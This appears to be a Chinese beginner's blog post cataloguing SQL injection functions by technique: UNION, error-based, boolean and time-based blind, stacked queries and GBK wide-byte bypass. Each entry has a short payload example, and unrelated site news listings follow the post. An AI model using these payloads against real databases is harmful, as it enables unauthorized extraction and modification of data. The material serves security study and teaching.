SQL 注入所需函数详解——按注入方式分类
新人博客已发布文章会持续更新有短缺请见谅会尽快补齐欢迎评论区提出谢谢一、联合查询注入UNION 注入联合查询注入是最常见的注入方式核心是使用UNION SELECT将攻击者构造的查询结果拼接到原查询结果中。1.1 核心函数函数用途示例UNION SELECT合并两个查询结果集UNION SELECT 1,2,3ORDER BY判断原查询的字段数ORDER BY 1--LIMIT限制返回行数LIMIT 0,1GROUP_CONCAT()将多行结果拼接成一行MySQLSELECT GROUP_CONCAT(table_name)CONCAT()拼接字符串SELECT CONCAT(username,0x3a,password)CONCAT_WS()使用分隔符拼接字符串SELECT CONCAT_WS(~,a,b)DATABASE()获取当前数据库名UNION SELECT DATABASE()USER()获取当前用户UNION SELECT USER()VERSION()获取数据库版本UNION SELECT VERSION()二、报错注入报错注入利用数据库错误信息回显敏感数据适用于页面有错误回显但无正常回显位的场景。2.1 MySQL 报错函数函数用途示例updatexml()XML 文档更新函数参数错误时报错泄密updatexml(1,concat(0x7e,database()),1)extractvalue()XML 值提取函数语法错误时报错extractvalue(1,concat(0x7e,(SELECT table_name)))floor()向下取整 group by 产生主键冲突报错SELECT count(*),CONCAT(database(),floor(rand(0)*2))x FROM users GROUP BY xexp()指数函数参数过大时报错exp(~(SELECT * FROM (SELECT user())a))NAME_CONST()重复列名导致报错SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1))xBIGINT 溢出利用 ~0 与子查询拼接产生大数据溢出报错SELECT !(SELECT * FROM (SELECT user())x)-~02.2 SQL Server 报错函数函数用途示例convert()类型转换将查询结果转为 int 报错convert(int,version)CTXSYS.DRITHSX.SN()Oracle 报错注入函数CTXSYS.DRITHSX.SN(user,(SELECT banner FROM v$version))三、布尔盲注页面没有回显和报错但根据 SQL 语句正确与否会返回不同页面状态时使用布尔盲注。3.1 核心函数函数用途示例substr()截取字符串MySQLsubstr(database(),1,1)substring()截取字符串通用substring((SELECT table_name),1,1)mid()截取字符串MySQLmid(database(),1,1)left()从左侧截取 n 个字符left(database(),1)right()从右侧截取 n 个字符right(database(),1)ascii()返回字符的 ASCII 值ascii(substr(database(),1,1))ord()等同于 ascii()ord(substr(database(),1,1))length()返回字符串长度length(database())if()三目条件判断if(11,sleep(1),0)strcmp()字符串比较strcmp(left(database(),1),a)四、时间盲注页面没有任何回显差异时通过延时函数判断注入结果。4.1 核心函数函数适用数据库示例sleep()MySQLSELECT if(ascii(substr(database(),1,1))100,sleep(3),0)benchmark()MySQLSELECT benchmark(50000000,md5(test))WAITFOR DELAYSQL ServerWAITFOR DELAY 0:0:3DBMS_LOCK.SLEEP()OracleDBMS_LOCK.SLEEP(3)pg_sleep()PostgreSQLSELECT pg_sleep(3)GET_LOCK()MySQLSELECT GET_LOCK(a,3)heavy query通用SELECT count(*) FROM information_schema.columns A, information_schema.columns B五、堆叠注入支持一次执行多条 SQL 语句时可以使用堆叠注入。5.1 核心函数函数 / 语法用途示例;语句分隔符执行多条 SQL1;INSERT INTO users VALUES(hacker,pass);--HANDLERMySQL 中直接读取表数据无需 SELECT 权限HANDLER table_name OPEN; HANDLER table_name READ FIRST;PREPARE准备语句动态执行 SQLSET sqlCONCAT(SEL,ECT user());PREPARE st FROM sql;EXECUTE st;六、宽字节注入当数据库编码为 GBK 时利用反斜杠\与后续字符组合成 GBK 汉字绕开转义。6.1 核心函数函数用途示例%df结合\形成 GBK 汉字吃掉转义符?id1%df UNION SELECT 1,2,3--SET NAMES设置字符集理解宽字节成因SET NAMES gbk

相关新闻

新国标30天CMA实测:5款长效除醛产品真实测评,新房急住除醛避坑指南

新国标30天CMA实测:5款长效除醛产品真实测评,新房急住除醛避坑指南

新房装修完想快点入住,但一开门就是刺鼻的装修味,检测仪一测甲醛数值直奔 0.2mg/m 往上。租房成本压着、搬家日子催着,急住家庭最想知道的是:到底用什么方法除甲醛又快又稳,入住之后还不会反弹?市面上除甲醛…

2026/7/31 15:00:57 阅读更多 →
GetQzonehistory:三步完成QQ空间数据备份的完整方案

GetQzonehistory:三步完成QQ空间数据备份的完整方案

GetQzonehistory:三步完成QQ空间数据备份的完整方案 【免费下载链接】GetQzonehistory 获取QQ空间发布的历史说说 项目地址: https://gitcode.com/GitHub_Trending/ge/GetQzonehistory 你是否曾想过要永久保存QQ空间里的青春记忆?那些记录成长点滴…

2026/7/31 14:59:57 阅读更多 →
27岁,培训班出身,学历被卡的那几年,我找到了不看学历的赛道

27岁,培训班出身,学历被卡的那几年,我找到了不看学历的赛道

“统招本科吗?” 我说不是,我是培训班出来的。 面试官把简历递回来,全程不到三十秒。 这是我在西安的第九次面试,也是第九次卡在同一个问题上。27 岁,干 Java 三年,我连一次技术面的二面都没进过。 简历…

2026/7/31 14:59:57 阅读更多 →

最新新闻

Codex 生成代码不等于交付:用测试和审查识别 AI 编程幻觉

Codex 生成代码不等于交付:用测试和审查识别 AI 编程幻觉

Codex 生成代码不等于交付:用测试和审查识别 AI 编程幻觉 OK,OK,大家好,欢迎大家来到大鹏 AI 教育,我是张大鹏。 AI 编程最危险的时刻,往往不是它明显报错,而是代码看起来非常专业&#xff1a…

2026/7/31 19:23:06 阅读更多 →
Comet与Kodi整合教程:打造家庭影院级流媒体中心

Comet与Kodi整合教程:打造家庭影院级流媒体中心

Comet与Kodi整合教程:打造家庭影院级流媒体中心 【免费下载链接】comet Stremios fastest torrent/debrid search add-on. 项目地址: https://gitcode.com/gh_mirrors/comet40/comet Comet是Stremio最快的种子/解扰搜索插件,通过与Kodi媒体中心整…

2026/7/31 19:23:06 阅读更多 →
生产环境排障与可观测性:后端系统的实战经验汇总

生产环境排障与可观测性:后端系统的实战经验汇总

生产环境排障与可观测性:后端系统的实战经验汇总 一、从告警到根因:生产排障的核心挑战 生产环境排障是后端工程师的必备技能。与开发环境不同,生产环境面临**复杂性(分布式)、高压性(影响用户&#xff0…

2026/7/31 19:23:06 阅读更多 →
LibreCAD工程制图终极指南:7个专业技巧提升标注效率与精度

LibreCAD工程制图终极指南:7个专业技巧提升标注效率与精度

LibreCAD工程制图终极指南:7个专业技巧提升标注效率与精度 【免费下载链接】LibreCAD LibreCAD is a cross-platform 2D CAD program. It can read DXF/DWG, and write DXF/DWG/PDF/SVG files. It supports point/line/circle/ellipse/parabola/hyperbola/spline pr…

2026/7/31 19:23:06 阅读更多 →
Python数据管线与自动化运维工具开发:实战复盘与经验总结

Python数据管线与自动化运维工具开发:实战复盘与经验总结

Python数据管线与自动化运维工具开发:实战复盘与经验总结 一、从手工操作到自动化流水线:Python在工程效率中的关键角色 在过去十年,Python凭借简洁语法、丰富生态、快速原型能力,成为数据工程、自动化运维、DevOps工具链的首选…

2026/7/31 19:23:06 阅读更多 →
AI视频虚拟背景性能瓶颈全拆解:从GPU占用率98%到延迟<120ms的7步调优实录

AI视频虚拟背景性能瓶颈全拆解:从GPU占用率98%到延迟<120ms的7步调优实录

更多请点击&#xff1a; https://intelliparadigm.com 第一章&#xff1a;AI视频虚拟背景性能瓶颈全拆解&#xff1a;从GPU占用率98%到延迟<120ms的7步调优实录 AI视频虚拟背景在Zoom、Teams及自研会议系统中广泛部署&#xff0c;但真实场景下常遭遇GPU持续满载&#xff08…

2026/7/31 19:22:06 阅读更多 →

日新闻

物理复制比逻辑复制好在哪?数据库复制原理详解

物理复制比逻辑复制好在哪?数据库复制原理详解

数据库复制是把主库数据同步到备库的机制&#xff0c;分为逻辑复制和物理复制两种。逻辑复制传输的是 SQL 语句或行变更事件&#xff0c;物理复制传输的是存储引擎底层的物理日志。阿里云 PolarDB&#xff08;云原生数据库&#xff09;采用物理复制&#xff0c;在同步延迟、数据…

2026/7/31 0:00:34 阅读更多 →
BilibiliDown:3分钟学会B站视频下载的终极指南

BilibiliDown:3分钟学会B站视频下载的终极指南

BilibiliDown&#xff1a;3分钟学会B站视频下载的终极指南 【免费下载链接】BilibiliDown (GUI-多平台支持) B站 哔哩哔哩 视频下载器。支持稍后再看、收藏夹、UP主视频批量下载|Bilibili Video Downloader &#x1f633; 项目地址: https://gitcode.com/gh_mirrors/bi/Bilib…

2026/7/31 0:00:34 阅读更多 →
有哪些游戏数据AI平台?游戏行业Data+AI融合方案盘点

有哪些游戏数据AI平台?游戏行业Data+AI融合方案盘点

当前&#xff0c;游戏行业的“DataAI融合”已从概念验证进入价值落地阶段。根据IDC 2025年数据&#xff0c;中国AI游戏云市场规模已达18.6亿元&#xff1b;同时&#xff0c;游戏研发环节AI渗透率高达86%&#xff0c;生成式AI内容普及率超过50%。面对庞大的市场&#xff0c;游戏…

2026/7/31 0:00:34 阅读更多 →

周新闻

深度学习道路桥梁裂缝检测系统 道路桥梁裂缝检测数据集 道路桥梁病害识别检测数据集

深度学习道路桥梁裂缝检测系统 道路桥梁裂缝检测数据集 道路桥梁病害识别检测数据集

深度学习道路桥梁裂缝检测系统 数据集6000张 完整源码已标注数据集训练好的模型环境配置教程程序运行说明文档&#xff0c;可以直接使用&#xff01;系统支持图片、视频、摄像头等多种方式检测裂缝&#xff0c;功能强大实用。 1数据集6000张 8各类别

2026/7/31 1:03:03 阅读更多 →
深度学习YOLO模型如何训练 PUBG 绝地求生目标检测数据集

深度学习YOLO模型如何训练 PUBG 绝地求生目标检测数据集

pubg数据集 精选原图1.42万数据 1.49万标签 无任何重复、算法增强或冗余图像&#xff01; pubg绝地求生目标检测数据集 1分类&#xff1a;e_body&#xff0c;14905个标签&#xff0c;txt格式 共计14244张图&#xff0c;99%为640*640尺寸图像 适合yolo目标检测、AI训练关键词&am…

2026/7/29 14:34:28 阅读更多 →
Apex英雄目标检测数据集 深度学习框架YOLO如何训练APEX数据集

Apex英雄目标检测数据集 深度学习框架YOLO如何训练APEX数据集

Apex检测数据集数据集详情检测类别&#xff1a; allies enemy tag图片总量&#xff1a;7247张训练集&#xff1a;5139张验证集&#xff1a;1425张测试集&#xff1a;683张标注状态&#xff1a;全部已标注&#xff0c;即拿即用数据格式&#xff1a;支持YOLO格式及其他格式&#…

2026/7/31 4:19:39 阅读更多 →

月新闻